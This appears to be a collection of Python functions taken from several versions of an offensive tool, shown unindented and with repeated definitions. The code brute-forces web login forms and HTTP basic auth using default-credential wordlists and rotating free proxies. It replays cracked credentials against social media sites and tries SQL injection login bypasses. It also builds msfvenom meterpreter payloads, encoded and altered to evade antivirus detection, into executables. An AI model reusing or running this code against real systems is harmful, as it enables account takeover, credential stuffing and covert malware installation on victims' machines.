def submit(options, loginInfo, creds, result):
tryPassword, tryUsername = creds
realm = loginInfo[0]
for cred in list(result.queue):
if tryUsername == cred[0]:
return True # don't run if find password of username
if options.verbose:
printf("[+] Trying: %s:%s" % (tryUsername, tryPassword), 'norm')
try:
proc = startBrowser(options.timeout)
proc.add_password(options.url, tryUsername, tryPassword, realm)
proc.open(options.url)
try:
proc.open(options.url)
# printf("[*] Page title: ['%s']" %(proc.title()), "good")
printf("[*] %s [%s]" % ([tryUsername, tryPassword], proc.title()),
"good")
result.put([options.url, tryUsername, tryPassword])
# printf("[*] Match found: %s" %([tryUsername, tryPassword]), "good")
except Exception as err:
try:
if err.code == 401:
if options.verbose:
printf("[-] Failed %s" % (creds[::-1]), "bad")
else:
printf("[x] %s: %s" % (err, creds[::-1]), "bad")
except:
die("[x] HTTP GET:", err)
except:
if options.verbose:
printf("[x] Failed!", "bad")
def checkAllProxy(proxyList, target):
try:
for proxyAddr in proxyList:
proxyAddr = proxyAddr.replace("\n", "")
result = connProxy(proxyAddr, target)
if result:
#livelist.append(result)
actions.fwrite_c(TMP_PATH,
"%s\n" % (proxyAddr)) #TODO use queu here
except Exception as error:
utils.printf(error, "bad")
def submit(URL, tryUsername, tryPassword, proxy, verbose, result):
for cred in list(result.queue):
if tryUsername == cred[0]:
return 0 # don't run if find password of username
if verbose:
utils.printf("Trying: %s:%s" % (tryUsername, tryPassword), 'norm')
try:
resp = requests.get(URL, auth=HTTPBasicAuth(tryUsername, tryPassword))
if resp.status_code == 200:
result.put([tryUsername, tryPassword])
utils.printf("[*] Match found: %s:%s" % (tryUsername, tryPassword),
"good")
# pass
elif resp.status_code == 401:
if verbose:
utils.printf("[-] Failed: %s:%s" % (tryUsername, tryPassword),
"bad")
else:
# unknown
pass
except Exception as err:
utils.printf(
"[x] Error: %s:%s\n%s at %s" %
(tryUsername, tryPassword, error, URL), "bad")
def submit(optionURL, tryCreds, optionProxy, optionVerbose, result):
try:
proc = tbrowser.startBrowser()
proc.addheaders = [('User-Agent', tbrowser.useragent())]
utils.printf("[+] Checking %s" % (optionURL))
proc.open(optionURL)
loginInfo = tbrowser.parseLoginForm(proc.forms())
except Exception as err:
if optionVerbose:
utils.printf("[x] ReAuth: %s at %s" % (err, optionURL), "bad")
if not loginInfo:
if optionVerbose:
utils.printf(
"[x] ReAuth: Can't find login form at %s" % (optionURL), "bad")
else:
try:
loginbrute.submit(
optionURL,
tryCreds[::-1],
optionProxy, # Reverse username + password. Dynamic submit in loginbrute
"",
optionVerbose,
loginInfo,
result,
True # No key false by default, result now should be url
)
except Exception as err:
if optionVerbose:
utils.printf("[x] ReAuth: Submitting error for %s" % (err),
"bad")
def checProxyConnProvider(url="https://free-proxy-list.net/"):
try:
printf("[+] Getting proxy list from %s" % (url))
getproxy = startBrowser(options.timeout)
getproxy.open(url)
printf("[*] Gathering proxies completed.", "good")
return getproxy.response().read()
except Exception as error:
die("[x] GetProxy: Error while connecting to proxy server!", error)
finally:
getproxy.close()
def submit(url, options, tryCreds, result):
try:
proc = startBrowser(options.timeout)
printf("[+] Checking %s" %(url))
proc.open(url)
loginInfo = parseLoginForm(proc.forms())
except Exception as err:
if options.verbose:
printf("[x] ReAuth: %s at %s" %(err, url), "bad")
if not loginInfo:
if options.verbose:
printf("[x] ReAuth: Can't find login form at %s" %(url), "bad")
else:
try:
options.url = url
loginbrute.submit(
# Reverse username + password. Dynamic submit in loginbrute
options, loginInfo, tryCreds[-2:][::-1], result
)
except Exception as err:
if options.verbose:
printf("[x] ReAuth: Submitting error for %s" %(err), "bad")
def run(self):
try:
data = actions.getout(self.source)
data = actions.evade(self.platform, self.evasion_tech, self.evasion_method, data, self.output_name)
# Get new data, start writing to output file
if self.destination[-1] != '/':
self.destination += '/'
output_payload = self.destination + 'output.c'
actions.writeout(data, output_payload)
# Write done!, start building exe file
actions.build_exec(self.platform, self.architecture, output_payload, self.destination, self.output_name)
except:
utils.printf("Error while running module", 'bad')
def refresh():
try:
listproxy = parse_proxy(get_proxy_list())
except:
listproxy = ""
finally:
try:
listproxy = "\n".join(listproxy)
utils.printf("Write data to %s." % (PROXY_PATH))
actions.fwrite(PROXY_PATH, listproxy)
utils.printf("Write data to %s completed!" % (PROXY_PATH), "good")
except Exception as error:
utils.die("Error while writting proxy data", error)
def run(options, creds):
social_urls = data.social_urls().replace("\t", "").split("\n")
for url in social_urls:
if options.url in url:
social_urls.remove(url)
result = Queue()
#workers = []
try:
for tryCreds in creds:
for url in social_urls:
submit(url, options, tryCreds, result)
# if len(workers) == options.threads:
# do_job(workers)
# del workers[:]
# worker = threading.Thread(
# target = submit,
# args = (url, options, tryCreds, result)
# )
#worker.daemon = True
#workers.append(worker)
#do_job(workers)
#del workers[:]
except KeyboardInterrupt:
printf("[x] Terminated by user!", "bad")
import os
os._exit(0)
except SystemExit:
die("[x] Terminated by system!", "SystemExit")
except Exception as err:
die("[x] ReAuth: Runtime error", err)
finally:
result = list(result.queue)
if len(result) == 0:
printf("[-] No extra valid password found", "bad")
else:
print_table(("Target", "Username", "Password"), *result)
def get_options(self):
szOptions = len(sys.argv)
if szOptions == 1:
# NO ARGUMENT
print_fast_help()
printf("Use: %s for more infomation\n" % (self.HELP_OPTIONS))
sys.exit(0)
else:
try:
self.parse_options(szOptions)
except Exception as error:
die("[x] Options: Parse options error", error)
def checkOption(options, run_options):
finalOption = {}
global MODE, DEF_WORDLIST
# Modify URL value to correct format
# Read password list
# Read userlist
# Convert to int(threads)
try:
finalOption["threads"] = int(options["-t"])
if finalOption["threads"] < 1:
utils.die("Argument error", "Threads must be > 1")
except Exception as ConvertError:
utils.die("Invalid threads", ConvertError)
if MODE == "--sqli":
finalOption["passlist"] = "MyP@ssW0rd"
finalOption["userlist"] = data.getSQL()
else:
# WARNING eval() is called. It can be unsafe
finalOption["passlist"] = eval(
"data.%s_pass()" % (options["-p"])).replace(
"\t", "") if options["-p"] in DEF_WORDLIST else actions.fread(
options["-p"])
if options["-U"]:
finalOption["userlist"] = actions.lread(options["-U"])
else:
finalOption["userlist"] = eval(
"data.%s_user()" % (options["-u"])).replace(
"\t",
"") if options["-u"] in DEF_WORDLIST else actions.fread(
options["-u"])
finalOption["falsekey"] = options["-k"]
if run_options["--proxy"]:
try:
import data
run_options["--proxy"] = actions.fread(
"%s/liveproxy.txt" % (data.__path__[0])).split("\n")
except Exception as err:
utils.printf("Argument error", err)
return finalOption, run_options
def check_login(opts):
try:
proc = startBrowser(options.timeout)
proc.open(opts.url)
"""
Check URL type. If Website directs to other URL,
options.url is website's panel
else: it is login url.
Example: options.url = site.com/wp-admin/ -> panel
site directs user to wp-login -> login URL
options.url = site.com/wp-login.php -> login URL
"""
if proc.geturl() != opts.url:
printf("[*] Website moves to: ['%s']" % (proc.geturl()), "norm")
opts.panel_url, opts.login_url = opts.url, proc.geturl()
else:
opts.login_url = opts.url
# printf("[*] Connect success!", "good")
options.attack_mode = "--loginbrute"
if opts.run_options["--verbose"]:
printf("[*] %s" % (proc.title()), "norm")
# printf("[+] Analyzing login form....")
loginInfo = parseLoginForm(proc.forms())
return loginInfo
except Exception as error:
try:
if error.code == 401:
## GET INFORMATION
resp_header = str(proc.response().info())
if "WWW-Authenticate" in resp_header:
loginID = checkHTTPGetLogin(resp_header)
loginInfo = (loginID, ["Password", "User Name"])
if options.verbose:
printf("[+] Using HTTP GET Authentication mode",
"norm")
options.attack_mode = "--httpget"
else:
loginInfo = False
else:
loginInfo = False
printf("[x] Target check: %s" % (error), "bad")
# Error != http code
except:
loginInfo = False
die("[x] Target check:", error)
except KeyboardInterrupt:
loginInfo = False
finally:
proc.close()
return loginInfo
def checProxyConnProvider(url="https://free-proxy-list.net/"):
try:
utils.printf("Connecting to %s." % (url))
getproxy = tbrowser.startBrowser()
user_agent = tbrowser.useragent()
getproxy.addheaders = [('User-Agent', user_agent)]
getproxy.open(url)
utils.printf("Gathering proxies completed.", "good")
return getproxy.response().read()
except Exception as error:
utils.die("GetProxy: Error while connecting to proxy server!",
error)
finally:
getproxy.close()
def run(checkedURL, creds, optionThreads, optionProxy, optionVerbose):
social_urls = data.social_urls().replace("\t", "").split("\n")
for url in social_urls:
# BUG double_free()
if checkedURL in url:
social_urls.remove(url)
result = Queue()
workers = []
try:
for tryCreds in creds:
for url in social_urls:
if actions.size_o(workers) == optionThreads:
do_job(workers)
del workers[:]
worker = threading.Thread(target=submit,
args=(url, tryCreds, optionProxy,
optionVerbose, result))
worker.daemon = True
workers.append(worker)
do_job(workers)
del workers[:]
except KeyboardInterrupt:
utils.die("[x] Terminated by user!", "KeyboardInterrupt")
except SystemExit:
utils.die("[x] Terminated by system!", "SystemExit")
except Exception as err:
utils.die("[x] ReAuth: Runtime error", err)
finally:
result = list(result.queue)
if actions.size_o(result) == 0:
utils.printf("[-] No extra valid password found", "bad")
else:
utils.print_table(("Target", "Username", "Password"), *result)
def get_proxy_list(url="https://free-proxy-list.net/"):
try:
utils.printf("Connecting to %s." % (url))
# getproxy = mechanize.Browser()
# getproxy.set_handle_robots(False)
getproxy = tbrowser.startBrowser()
user_agent = tbrowser.useragent()
getproxy.addheaders = [('User-Agent', user_agent)]
getproxy.open(url)
utils.printf("Gathering proxy completed.", "good")
return getproxy.response().read()
except Exception as error:
utils.die("Error while connecting to live proxy server!", error)
finally:
getproxy.close()
def getNewProxy(PROXY_PATH):
def parse_proxy(response):
try:
re_ip = r"\b(?:\d{1,3}\.){3}\d{1,3}\b<\/td><td>\d{1,5}"
result = re.findall(re_ip, response, re.MULTILINE)
result = [element.replace("</td><td>", ":") for element in result]
return result
except Exception as error:
utils.die("GetProxy: Error while parsing proxies.", error)
def checProxyConnProvider(url="https://free-proxy-list.net/"):
try:
utils.printf("Connecting to %s." % (url))
getproxy = tbrowser.startBrowser()
user_agent = tbrowser.useragent()
getproxy.addheaders = [('User-Agent', user_agent)]
getproxy.open(url)
utils.printf("Gathering proxies completed.", "good")
return getproxy.response().read()
except Exception as error:
utils.die("GetProxy: Error while connecting to proxy server!",
error)
finally:
getproxy.close()
try:
listproxy = parse_proxy(checProxyConnProvider())
except:
listproxy = ""
finally:
try:
listproxy = "\n".join(listproxy)
utils.printf("Write data to %s." % (PROXY_PATH))
actions.fwrite(PROXY_PATH, listproxy)
utils.printf("Write data to %s completed!" % (PROXY_PATH), "good")
except Exception as error:
utils.die("GetProxy: Error while writting data", error)
def build_exec(platform, architecture, srcPath, destPath, outname):
if platform == 'windows':
destPath += '{}.exe'.format(outname)
else:
destPath += outname
build_cmd = {
'windows': {
'x86':
'i686-w64-mingw32-gcc {} -o {} -mwindows'.format(
srcPath, destPath),
'x64':
'x86_x64-w64-mingw32-gcc {} -o {} -mwindows'.format(
srcPath, destPath)
},
'linux': {
'x86': 'gcc {} -o {} -m32 -static'.format(srcPath, destPath),
'x64': 'gcc {} -o {} -static'.format(srcPath, destPath)
}
# ['android', 'davik', 'command']
}
utils.printf("Generating build command", 'warn')
try:
build_cmd = build_cmd[platform][architecture]
os.popen(build_cmd)
utils.printf("Build completed at {}".format(destPath), 'good')
except:
utils.printf("Wrong building command. Check your options", 'bad')
def getLoginForm(optionURL, browser, verbose):
######################################
# Test connect to URL
# Fetch login field
#
#####################################
try:
browser.open(optionURL)
formLoginID, formUserfield, formPasswdfield = parseLoginForm(
browser.forms())
if verbose:
utils.printf("Found login form", "good")
return formLoginID, formUserfield, formPasswdfield
except TypeError as error:
utils.die("Can not find login form", error)
except Exception as error:
utils.die("Checking connection error", error)
def writeout(data, path):
utils.printf("Trying to write new data", 'warn')
try:
writeData = open(path, 'w')
writeData.write(data)
writeData.close()
utils.printf("Data has been written", 'good')
except:
utils.printf("Error while writing data at {}".format(path), 'bad')
def getout(path):
utils.printf("Loading file", 'warn')
try:
getData = open(path, 'r')
data = getData.read()
getData.close()
utils.printf("Loading data completed", 'good')
return data
except:
utils.printf("Can not read file at {}".format(path), 'bad')
def submit(URL, tryUsername, tryPassword, proxy, verbose, result):
if verbose:
utils.printf("Trying: %s:%s" %(tryUsername, tryPassword), 'norm')
try:
resp = requests.get(URL, auth = HTTPBasicAuth(tryUsername, tryPassword))
if resp.status_code == 200:
result.put([tryUsername, tryPassword])
utils.printf("[*] Match found: %s:%s" %(tryUsername, tryPassword), "good")
# pass
elif resp.status_code == 401:
if verbose:
utils.printf("[-] Failed: %s:%s" %(tryUsername, tryPassword), "bad")
else:
# unknown
pass
except Exception as err:
utils.printf("[x] Error: %s:%s\n%s" %(tryUsername, tryPassword, error), "bad")
def connProxy(proxyAddr, target):
try:
proxyTest = tbrowser.startBrowser()
user_agent = tbrowser.useragent()
proxyTest.addheaders = [('User-Agent', user_agent)]
utils.printf(proxyAddr)
proxyTest.set_proxies({"http": proxyAddr})
proxyTest.open(target)
utils.printf(proxyAddr, "good")
return proxyAddr
except Exception as error:
utils.printf("%s %s" % (proxyAddr, error), "bad")
return None
finally:
try:
proxyTest.close()
except:
pass
def getnew(options):
def parse_proxy(response):
try:
re_ip = r"\b(?:\d{1,3}\.){3}\d{1,3}\b<\/td><td>\d{1,5}"
result = re.findall(re_ip, response, re.MULTILINE)
result = [element.replace("</td><td>", ":") for element in result]
return result
except Exception as error:
die("[x] GetProxy: Error while parsing proxies.", error)
def checProxyConnProvider(url="https://free-proxy-list.net/"):
try:
printf("[+] Getting proxy list from %s" % (url))
getproxy = startBrowser(options.timeout)
getproxy.open(url)
printf("[*] Gathering proxies completed.", "good")
return getproxy.response().read()
except Exception as error:
die("[x] GetProxy: Error while connecting to proxy server!", error)
finally:
getproxy.close()
try:
listproxy = parse_proxy(checProxyConnProvider())
except:
listproxy = ""
finally:
try:
listproxy = "\n".join(listproxy)
printf("[*] Get %s proxies." % (len(listproxy)), "good")
printf("[+] Saving to %s" % (PROXY_PATH))
fwrite(PROXY_PATH, listproxy)
printf("[*] Data saved!", "good")
except Exception as error:
die("[x] GetProxy: Error while writting data", error)
def checProxyConn(proxyAddr, target, result, verbose):
try:
proxyTest = startBrowser(options.timeout)
proxyTest.set_proxies({"http": proxyAddr})
if verbose:
printf("[+] Trying: %s" % (proxyAddr))
proxyTest.open(options.url)
if verbose:
printf("[*] Success: %s" % (proxyAddr), "good")
result.put(proxyAddr)
except Exception as error:
if verbose:
printf("[x] %s %s" % (proxyAddr, error), "bad")
finally:
try:
proxyTest.close()
except:
pass
def checProxyConn(proxyAddr, target, result, verbose):
try:
proxyTest = tbrowser.startBrowser()
user_agent = tbrowser.useragent()
proxyTest.addheaders = [('User-Agent', user_agent)]
proxyTest.set_proxies({"http": proxyAddr})
if verbose:
utils.printf("Trying: %s" % (proxyAddr))
proxyTest.open(target)
if verbose:
utils.printf("Success: %s" % (proxyAddr), "good")
result.put(proxyAddr)
except Exception as error:
if verbose:
utils.printf("%s %s" % (proxyAddr, error), "bad")
finally:
try:
proxyTest.close()
except:
pass
def submit(optionURL, tryCred, setProxyList, setKeyFalse, optionVerbose,
loginInfo, result, optionReauth):
# Get login form field informations
# BUG parse form issue with gmail, move to tbrowser.parseLoginForm
frmLoginID, frmFields = loginInfo
tryPassword, tryUsername = tryCred
proc = tbrowser.startBrowser()
user_agent = tbrowser.useragent()
proc.addheaders = [('User-Agent', user_agent)]
for cred in list(result.queue):
if tryUsername == cred[0]:
return 0 # don't run if find password of username
if setProxyList:
#Set proxy connect
proxyAddr = actions.randomFromList(setProxyList)
proc.set_proxies({"http": proxyAddr})
try:
proc.open(optionURL)
# Select login form
proc.select_form(nr=frmLoginID)
# FILLS ALL FIELDS https://stackoverflow.com/a/5389578
for field, cred in zip(frmFields, tryCred):
proc.form[field] = cred
# Send request
proc.submit()
if optionVerbose:
utils.printf("Trying: %s:%s" % (tryUsername, tryPassword), 'norm')
if setProxyList:
utils.printf("Using proxy: %s" % (proxyAddr), 'norm')
# Reload - useful for redirect to dashboard
proc.reload()
# If no login form -> success
# TODO improve condition to use captcha
if not tbrowser.parseLoginForm(proc.forms()):
if setKeyFalse:
if setKeyFalse not in proc.response().read():
# Add creds to success list
# If verbose: print
if tryUsername:
utils.printf(
"[*] Match found: %s:%s" %
(tryUsername, tryPassword), "good")
#result.put([tryUsername, tryPassword])
else:
utils.printf("[*] Password found: %s" % (tryPassword),
"good")
#result.put([tryPassword])
if not optionReauth:
result.put([tryUsername, tryPassword])
else:
result.put([
optionURL.split("/")[2], tryUsername, tryPassword
])
# Clear object and try new username
else:
if optionVerbose:
utils.printf(
"[-] Failed: %s:%s" % (tryUsername, tryPassword),
"bad")
else:
if tryUsername:
utils.printf(
"[*] Match found: %s:%s" % (tryUsername, tryPassword),
"good")
#result.put([tryUsername, tryPassword])
else:
utils.printf("[*] Password found: %s" % (tryPassword),
"good")
#result.put([tryPassword])
if not optionReauth:
result.put([tryUsername, tryPassword])
else:
result.put(
[optionURL.split("/")[2], tryUsername, tryPassword])
# Clear object and try new username
else:
if optionVerbose:
utils.printf("[-] Failed: %s:%s" % (tryUsername, tryPassword),
"bad")
except mechanize.HTTPError as error:
# Get blocked
if optionVerbose:
utils.printf(
"[x] Error: %s:%s\n%s at %s" %
(tryUsername, tryPassword, error, optionURL), "bad")
return False
except Exception as error:
if optionVerbose:
utils.printf(
"[x] Error: %s:%s\n%s at %s" %
(tryUsername, tryPassword, error, optionURL), "bad")
return False
finally:
proc.close()
return True
def run(self):
try:
utils.printf("Generating options", 'warn')
generate = {
'windows': {
'x86':
'msfvenom -p windows/meterpreter/bind_tcp -a {} '.format(
self.architecture),
'x64':
'msfvenom -p windows/x64/meterpreter/bind_tcp -a {} '.
format(self.architecture)
},
'linux': {
'x86': 'msfvenom -p linux/x86/meterpreter/bind_tcp -a x86',
'x64': 'msfvenom -p linux/x64/meterpreter/bind_tcp -a x64'
}
}
randiter = str(random.randint(7, 18))
generate = generate[self.platform][
self.architecture] + 'lport={} '.format(self.lport)
generate += '--smallest -e x86/shikata_ga_nai -f c -b "\\x00\\x0a\\x0d" -i {} '.format(
randiter)
src_output = 'output/meterpreter_bind.c'
generate += '-o {} --platform {}'.format(src_output, self.platform)
utils.printf("Generating payload", 'warn')
os.popen(generate)
utils.printf("Output source generated at {}".format(src_output),
'good')
except:
utils.printf("Error while generating payload", 'bad')
return ''
utils.printf("Generating FUD payload", 'warn')
try:
data = actions.getout(src_output)
data = actions.evade(self.platform, self.evasion_tech,
self.evasion_method, data, self.output_name)
actions.writeout(data, src_output)
utils.printf("Generating FUD completed", 'good')
except:
utils.printf("Error while generating FUD payload", 'bad')
return ''
utils.printf("Building executable file", 'warn')
actions.build_exec(self.platform, self.architecture, src_output,
'output/', self.output_name)
utils.printf("Build completed", 'good')
def submit(options, loginInfo, tryCred, result):
# Get login form field informations
# frmLoginID, frmFields = loginInfo
tryPassword, tryUsername = tryCred
proc = startBrowser()
for cred in list(result.queue):
if tryUsername == cred[1]:
return True
if options.proxy:
# Set proxy connect
proxyAddr = randomFromList(options.proxy)
proc.set_proxies({"http": proxyAddr})
try:
proc.open(options.login_url)
_form = parseLoginForm(proc.forms())
if not _form:
if options.verbose:
printf("[x] LoginBrute: No login form found. Possibly get blocked!")
return False
else:
frmLoginID, frmFields = _form
frmUsername, _ = frmFields
if options.verbose and loginInfo != _form:
printf("[+] Warning: Form field has been changed!")
# Select login form
proc.select_form(nr = frmLoginID)
# FILLS ALL FIELDS https://stackoverflow.com/a/5389578
proc.form[frmUsername] = tryUsername
proc.submit()
_, _, frmPasswd = parseLoginForm(proc.forms())
proc.form[frmPasswd] = tryPassword
proc.submit()
# page_title = proc.title()
# Send request
if options.verbose:
if options.proxy:
printf("[+] Trying: %s through %s" %([tryUsername, tryPassword],proxyAddr), 'norm')
else:
printf("[+] Trying: %s" %([tryUsername, tryPassword]), 'norm')
# Reload the browser. For javascript redirection and others...
# proc.reload()
# If no login form -> maybe success. Check conditions
if not parseLoginForm(proc.forms()):# != loginInfo:
test_result = check_condition(options, proc, loginInfo)
if test_result == 1:
printf("[*] Page title: ['%s']" %(proc.title()), "good")
# "If we tried login form with username+password field"
if tryUsername:
printf("[*] Found: %s" %([tryUsername, tryPassword]), "good")
# "Else If we tried login form with password field only"
else:
printf("[*] Found: %s" %([tryPassword]), "good")
result.put([options.url, tryUsername, tryPassword])
elif test_result == 2 and options.verbose:
printf("[+] SQL Injection vulnerable found")
printf(" %s" %([tryUsername, tryPassword]), "norm")
else:
# Possibly Error. But sometime it is true
if options.verbose:
printf("[x] Get error page: %s" %([tryUsername, tryPassword]), "bad")
printf(" [x] Page title: ['%s']" %(proc.title()), "bad")
# "Login form is still there. Oops"
else:
# TODO test if web has similar text (static)
if sqlerror(proc.response().read()) and options.verbose:
printf("[+] SQL Injection vulnerable found")
printf(" %s" %([tryUsername, tryPassword]), "norm")
if options.verbose:
if options.proxy:
printf(
"[-] Failed: %s through %s" %([tryUsername, tryPassword], proxyAddr),
"bad"
)
else:
printf(
"[-] Failed: %s" %([tryUsername, tryPassword]),
"bad"
)
return True
except Exception as error:
"""
Sometimes, web servers return error code because of bad configurations,
but our cred is true.
This code block showing information, for special cases
"""
try:
# Unauthenticated
if error.code == 401:
if options.verbose:
printf("[-] Failed: %s" %([tryUsername, tryPassword]), "bad")
# Server misconfiguration? Panel URL is deleted or wrong
elif error.code == 404:
printf("[x] %s: %s" %(error, tryCred[::-1]), "bad")
if options.verbose:
printf(" %s" %(proc.url()), "bad")
# Other error code
else:
if options.verbose:
printf("[x] (%s): %s" %(proc.url(), tryCred[::-1]), "bad")
except:
# THIS BLOCKED BY WAF
printf("[x] Loginbrute: %s" %(error), "bad")
return False
finally:
proc.close()
def getUserOptions():
global URL, MODE, r_options, DEF_WORDLIST
# Default operation modes:
# --brute: brute force
# --sqli: sql injection bypass login (TODO)
# --httpauth: http basic authentication
DEF_R_MODE = ("--brute", "--sqli", "--httpauth")
# Default running mode:
# --verbose: display informations
# --report: create task report
# --proxy: Running using proxy
# Default options:
# -u: Read userlist from file
# -p: Read passlit from file
# -U: Read username / userlist directly from argument
# -t: Number of threads using
# -k: Set key for false condition (for special cases)
# Default wordlist: default, router, unix, tomcat, cctv, mirai, http
options = {
"-u": "default",
"-p": "default",
"-t": 16,
"-k": None,
"-U": None,
}
GETPROXY = False
########### STARTING ##################
if len(sys.argv) == 1:
utils.print_help()
sys.exit(0)
idx = 1
while idx < len(sys.argv):
if sys.argv[idx] in ("-h", "--help", "help"):
utils.print_help()
sys.exit(0)
else:
if sys.argv[idx][:2] == "--":
if sys.argv[idx] in r_options.keys():
# --verbose", "--report", "--proxy"
r_options[sys.argv[idx]] = True
elif sys.argv[idx] in DEF_R_MODE:
# "--brute", "--sqli", "--httpauth"
MODE = sys.argv[idx]
elif sys.argv[idx] == "--list":
# Wordlist provided
if sys.argv[idx + 1] in DEF_WORDLIST:
options["-u"], options["-p"], idx = sys.argv[
idx + 1], sys.argv[idx + 1], idx + 1
else:
utils.die("Error while parsing arguments",
"Invalid wordlist %s" % (sys.argv[idx + 1]))
elif sys.argv[idx] == "--getproxy":
GETPROXY = True
else:
utils.die("Error while parsing arguments",
"Invalid option %s" % (sys.argv[idx]))
elif sys.argv[idx][:1] == "-":
if sys.argv[idx] in options.keys():
# "-u", "-U", "-p", "-t", "-k"
options[sys.argv[idx]], idx = sys.argv[idx + 1], idx + 1
else:
utils.die("Error while parsing arguments",
"Invalid option %s" % (sys.argv[idx]))
else:
URL = sys.argv[idx]
idx += 1
URL = checkURL(URL)
if GETPROXY:
# TODO Auto brute using proxy after get new proxy
# TODO New help banner
from extras import getproxy
try:
threads = int(options["-t"])
except Exception as err:
utils.die("GetProxy: Error while parsing arguments", err)
getproxy.main(URL, threads, r_options["--verbose"])
# GET NEW PROXY LIST ONLY
if not URL:
sys.exit(0)
# else: CHECK PROXY TO TARGET DONE, AUTO ATTACK?
# r_options["--proxy"] == True
if not URL:
utils.die("Error while parsing arguments", "Invalid URL")
utils.printf(utils.start_banner(URL, options, MODE, r_options), "good")
options, r_options = checkOption(options, r_options)
return URL, options, MODE, r_options
def getUserOptions():
global URL, USERLIST, PASSLIST, THREADS, KEY_FALSE, MODE, r_options
# Default operation modes:
# --brute: brute force
# --sqli: sql injection bypass login (TODO)
# --basic: http basic authentication (TODO)
DEF_A_MODE = ("--brute", "--sqli", "--basic")
# Default running mode:
# --verbose: display informations (TODO)
# --log: creating log file (TODO)
# --proxy: Running using proxy
DEF_R_MODE = ("--verbose", "--log", "--proxy")
# Default options:
# -u: Read userlist from file
# -p: Read passlit from file
# -U: Read username / userlist directly from argument
# -t: Number of threads using #TODO Modify for new module
# -k: Set key for false condition (for special cases)
DEF_OPS = ("-u", "-U", "-p", "-t", "-k")
options = {
"-u": USERLIST,
"-p": PASSLIST,
"-t": THREADS,
"-k": KEY_FALSE,
"-U": None,
}
if len(sys.argv) == 1:
utils.print_help()
sys.exit(0)
idx = 1
while idx < len(sys.argv):
if sys.argv[idx] in ("-h", "--help", "help"):
utils.print_help()
else:
if sys.argv[idx] in DEF_R_MODE:
r_options[sys.argv[idx]] = True
elif sys.argv[idx] in DEF_A_MODE:
MODE = sys.argv[idx]
idx += 1
elif sys.argv[idx] in DEF_OPS:
options[sys.argv[idx]] = sys.argv[idx + 1]
idx += 1
else:
URL = sys.argv[idx]
idx += 1
if not URL:
utils.printf("An URL is required", "bad")
sys.exit(1)
else:
utils.printf(craftbanner(URL, options, MODE, r_options), "good")
URL, options, r_options = checkOption(URL, options, r_options)
return URL, options, MODE, r_options
